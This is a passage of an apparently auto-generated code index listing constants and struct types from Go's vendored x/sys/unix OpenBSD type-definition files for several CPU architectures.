struct constant PathMax (line 135) | PathMax = 0x400 constant ST_WAIT (line 139) | ST_WAIT = 0x1 constant ST_NOWAIT (line 140) | ST_NOWAIT = 0x2 constant FADV_NORMAL (line 144) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 145) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 146) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 147) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 148) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 149) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 152) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 160) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 169) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 175) | type RawSockaddrDatalink struct type RawSockaddr (line 186) | type RawSockaddr struct type RawSockaddrAny (line 192) | type RawSockaddrAny struct type _Socklen (line 197) | type _Socklen type Linger (line 199) | type Linger struct type Iovec (line 204) | type Iovec struct type IPMreq (line 209) | type IPMreq struct type IPv6Mreq (line 214) | type IPv6Mreq struct type Msghdr (line 219) | type Msghdr struct type Cmsghdr (line 231) | type Cmsghdr struct type Inet6Pktinfo (line 237) | type Inet6Pktinfo struct type IPv6MTUInfo (line 242) | type IPv6MTUInfo struct type ICMPv6Filter (line 247) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 252) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 253) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 254) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 255) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 256) | SizeofSockaddrDatalink = 0x14 constant SizeofLinger (line 257) | SizeofLinger = 0x8 constant SizeofIovec (line 258) | SizeofIovec = 0x10 constant SizeofIPMreq (line 259) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 260) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 261) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 262) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 263) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 264) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 265) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 269) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 270) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 271) | PTRACE_KILL = 0x8 type Kevent_t (line 274) | type Kevent_t struct type FdSet (line 284) | type FdSet struct constant SizeofIfMsghdr (line 289) | SizeofIfMsghdr = 0x98 constant SizeofIfData (line 290) | SizeofIfData = 0x88 constant SizeofIfaMsghdr (line 291) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 292) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 293) | SizeofRtMsghdr = 0x78 constant SizeofRtMetrics (line 294) | SizeofRtMetrics = 0x50 type IfMsghdr (line 297) | type IfMsghdr struct type IfData (line 308) | type IfData struct type IfaMsghdr (line 331) | type IfaMsghdr struct type IfAnnounceMsghdr (line 342) | type IfAnnounceMsghdr struct type RtMsghdr (line 351) | type RtMsghdr struct type RtMetrics (line 368) | type RtMetrics struct type Mclpool (line 381) | type Mclpool constant SizeofBpfVersion (line 384) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 385) | SizeofBpfStat = 0x80 constant SizeofBpfProgram (line 386) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 387) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 388) | SizeofBpfHdr = 0x20 type BpfVersion (line 391) | type BpfVersion struct type BpfStat (line 396) | type BpfStat struct type BpfProgram (line 403) | type BpfProgram struct type BpfInsn (line 409) | type BpfInsn struct type BpfHdr (line 416) | type BpfHdr struct type BpfTimeval (line 424) | type BpfTimeval struct type Termios (line 429) | type Termios struct type Winsize (line 439) | type Winsize struct type Ptmget (line 446) | type Ptmget struct constant AT_FDCWD (line 454) | AT_FDCWD = -0x64 constant AT_EACCESS (line 455) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 456) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 457) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 458) | AT_REMOVEDIR = 0x800 type PollFd (line 461) | type PollFd struct constant POLLERR (line 468) | POLLERR = 0x8 constant POLLHUP (line 469) | POLLHUP = 0x10 constant POLLIN (line 470) | POLLIN = 0x1 constant POLLNVAL (line 471) | POLLNVAL = 0x20 constant POLLOUT (line 472) | POLLOUT = 0x4 constant POLLPRI (line 473) | POLLPRI = 0x2 constant POLLRDBAND (line 474) | POLLRDBAND = 0x80 constant POLLRDNORM (line 475) | POLLRDNORM = 0x40 constant POLLWRBAND (line 476) | POLLWRBAND = 0x100 constant POLLWRNORM (line 477) | POLLWRNORM = 0x4 type Sysctlnode (line 480) | type Sysctlnode struct type Utsname (line 493) | type Utsname struct constant SizeofUvmexp (line 501) | SizeofUvmexp = 0x278 type Uvmexp (line 503) | type Uvmexp struct constant SizeofClockinfo (line 585) | SizeofClockinfo = 0x14 type Clockinfo (line 587) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_386.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x8 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa0 constant SizeofIfData (line 265) | SizeofIfData = 0x88 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct constant SizeofBpfVersion (line 371) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 372) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 373) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 374) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 375) | SizeofBpfHdr = 0x18 type BpfVersion (line 378) | type BpfVersion struct type BpfStat (line 383) | type BpfStat struct type BpfProgram (line 388) | type BpfProgram struct type BpfInsn (line 393) | type BpfInsn struct type BpfHdr (line 400) | type BpfHdr struct type BpfTimeval (line 411) | type BpfTimeval struct type Termios (line 416) | type Termios struct type Winsize (line 426) | type Winsize struct constant AT_FDCWD (line 434) | AT_FDCWD = -0x64 constant AT_EACCESS (line 435) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 436) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 437) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 438) | AT_REMOVEDIR = 0x8 type PollFd (line 441) | type PollFd struct constant POLLERR (line 448) | POLLERR = 0x8 constant POLLHUP (line 449) | POLLHUP = 0x10 constant POLLIN (line 450) | POLLIN = 0x1 constant POLLNVAL (line 451) | POLLNVAL = 0x20 constant POLLOUT (line 452) | POLLOUT = 0x4 constant POLLPRI (line 453) | POLLPRI = 0x2 constant POLLRDBAND (line 454) | POLLRDBAND = 0x80 constant POLLRDNORM (line 455) | POLLRDNORM = 0x40 constant POLLWRBAND (line 456) | POLLWRBAND = 0x100 constant POLLWRNORM (line 457) | POLLWRNORM = 0x4 type Sigset_t (line 460) | type Sigset_t type Utsname (line 462) | type Utsname struct constant SizeofUvmexp (line 470) | SizeofUvmexp = 0x158 type Uvmexp (line 472) | type Uvmexp struct constant SizeofClockinfo (line 561) | SizeofClockinfo = 0x10 type Clockinfo (line 563) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x10 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 265) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct constant SizeofBpfVersion (line 371) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 372) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 373) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 374) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 375) | SizeofBpfHdr = 0x18 type BpfVersion (line 378) | type BpfVersion struct type BpfStat (line 383) | type BpfStat struct type BpfProgram (line 388) | type BpfProgram struct type BpfInsn (line 393) | type BpfInsn struct type BpfHdr (line 400) | type BpfHdr struct type BpfTimeval (line 411) | type BpfTimeval struct type Termios (line 416) | type Termios struct type Winsize (line 426) | type Winsize struct constant AT_FDCWD (line 434) | AT_FDCWD = -0x64 constant AT_EACCESS (line 435) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 436) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 437) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 438) | AT_REMOVEDIR = 0x8 type PollFd (line 441) | type PollFd struct constant POLLERR (line 448) | POLLERR = 0x8 constant POLLHUP (line 449) | POLLHUP = 0x10 constant POLLIN (line 450) | POLLIN = 0x1 constant POLLNVAL (line 451) | POLLNVAL = 0x20 constant POLLOUT (line 452) | POLLOUT = 0x4 constant POLLPRI (line 453) | POLLPRI = 0x2 constant POLLRDBAND (line 454) | POLLRDBAND = 0x80 constant POLLRDNORM (line 455) | POLLRDNORM = 0x40 constant POLLWRBAND (line 456) | POLLWRBAND = 0x100 constant POLLWRNORM (line 457) | POLLWRNORM = 0x4 type Sigset_t (line 460) | type Sigset_t type Utsname (line 462) | type Utsname struct constant SizeofUvmexp (line 470) | SizeofUvmexp = 0x158 type Uvmexp (line 472) | type Uvmexp struct constant SizeofClockinfo (line 561) | SizeofClockinfo = 0x10 type Clockinfo (line 563) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_arm.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 29) | type Timeval struct type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t type Stat_t (line 61) | type Stat_t struct type Statfs_t (line 81) | type Statfs_t struct type Flock_t (line 108) | type Flock_t struct type Dirent (line 116) | type Dirent struct type Fsid (line 126) | type Fsid struct constant PathMax (line 131) | PathMax = 0x400 type RawSockaddrInet4 (line 134) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 142) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 151) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 157) | type RawSockaddrDatalink struct type RawSockaddr (line 168) | type RawSockaddr struct type RawSockaddrAny (line 174) | type RawSockaddrAny struct type _Socklen (line 179) | type _Socklen type Linger (line 181) | type Linger struct type Iovec (line 186) | type Iovec struct type IPMreq (line 191) | type IPMreq struct type IPv6Mreq (line 196) | type IPv6Mreq struct type Msghdr (line 201) | type Msghdr struct type Cmsghdr (line 211) | type Cmsghdr struct type Inet6Pktinfo (line 217) | type Inet6Pktinfo struct type IPv6MTUInfo (line 222) | type IPv6MTUInfo struct type ICMPv6Filter (line 227) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 232) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 233) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 234) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 235) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 236) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 237) | SizeofLinger = 0x8 constant SizeofIovec (line 238) | SizeofIovec = 0x8 constant SizeofIPMreq (line 239) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 240) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 241) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 242) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 243) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 244) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 245) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 249) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 250) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 251) | PTRACE_KILL = 0x8 type Kevent_t (line 254) | type Kevent_t struct type FdSet (line 265) | type FdSet struct constant SizeofIfMsghdr (line 270) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 271) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 272) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 273) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 274) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 275) | SizeofRtMetrics = 0x38 type IfMsghdr (line 278) | type IfMsghdr struct type IfData (line 293) | type IfData struct type IfaMsghdr (line 319) | type IfaMsghdr struct type IfAnnounceMsghdr (line 333) | type IfAnnounceMsghdr struct type RtMsghdr (line 343) | type RtMsghdr struct type RtMetrics (line 362) | type RtMetrics struct constant SizeofBpfVersion (line 378) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 379) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 380) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 381) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 382) | SizeofBpfHdr = 0x18 type BpfVersion (line 385) | type BpfVersion struct type BpfStat (line 390) | type BpfStat struct type BpfProgram (line 395) | type BpfProgram struct type BpfInsn (line 400) | type BpfInsn struct type BpfHdr (line 407) | type BpfHdr struct type BpfTimeval (line 418) | type BpfTimeval struct type Termios (line 423) | type Termios struct type Winsize (line 433) | type Winsize struct constant AT_FDCWD (line 441) | AT_FDCWD = -0x64 constant AT_EACCESS (line 442) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 443) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 444) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 445) | AT_REMOVEDIR = 0x8 type PollFd (line 448) | type PollFd struct constant POLLERR (line 455) | POLLERR = 0x8 constant POLLHUP (line 456) | POLLHUP = 0x10 constant POLLIN (line 457) | POLLIN = 0x1 constant POLLNVAL (line 458) | POLLNVAL = 0x20 constant POLLOUT (line 459) | POLLOUT = 0x4 constant POLLPRI (line 460) | POLLPRI = 0x2 constant POLLRDBAND (line 461) | POLLRDBAND = 0x80 constant POLLRDNORM (line 462) | POLLRDNORM = 0x40 constant POLLWRBAND (line 463) | POLLWRBAND = 0x100 constant POLLWRNORM (line 464) | POLLWRNORM = 0x4 type Sigset_t (line 467) | type Sigset_t type Utsname (line 469) | type Utsname struct constant SizeofUvmexp (line 477) | SizeofUvmexp = 0x158 type Uvmexp (line 479) | type Uvmexp struct constant SizeofClockinfo (line 568) | SizeofClockinfo = 0x10 type Clockinfo (line 570) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_arm64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x10 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 265) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct constant SizeofBpfVersion (line 371) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 372) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 373) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 374) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 375) | SizeofBpfHdr = 0x18 type BpfVersion (line 378) | type BpfVersion struct type BpfStat (line 383) | type BpfStat struct type BpfProgram (line 388) | type BpfProgram struct type BpfInsn (line 393) | type BpfInsn struct type BpfHdr (line 400) | type BpfHdr struct type BpfTimeval (line 411) | type BpfTimeval struct type Termios (line 416) | type Termios struct type Winsize (line 426) | type Winsize struct constant AT_FDCWD (line 434) | AT_FDCWD = -0x64 constant AT_EACCESS (line 435) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 436) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 437) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 438) | AT_REMOVEDIR = 0x8 type PollFd (line 441) | type PollFd struct constant POLLERR (line 448) | POLLERR = 0x8 constant POLLHUP (line 449) | POLLHUP = 0x10 constant POLLIN (line 450) | POLLIN = 0x1 constant POLLNVAL (line 451) | POLLNVAL = 0x20 constant POLLOUT (line 452) | POLLOUT = 0x4 constant POLLPRI (line 453) | POLLPRI = 0x2 constant POLLRDBAND (line 454) | POLLRDBAND = 0x80 constant POLLRDNORM (line 455) | POLLRDNORM = 0x40 constant POLLWRBAND (line 456) | POLLWRBAND = 0x100 constant POLLWRNORM (line 457) | POLLWRNORM = 0x4 type Sigset_t (line 460) | type Sigset_t type Utsname (line 462) | type Utsname struct constant SizeofUvmexp (line 470) | SizeofUvmexp = 0x158 type Uvmexp (line 472) | type Uvmexp struct constant SizeofClockinfo (line 561) | SizeofClockinfo = 0x10 type Clockinfo (line 563) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_mips64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant 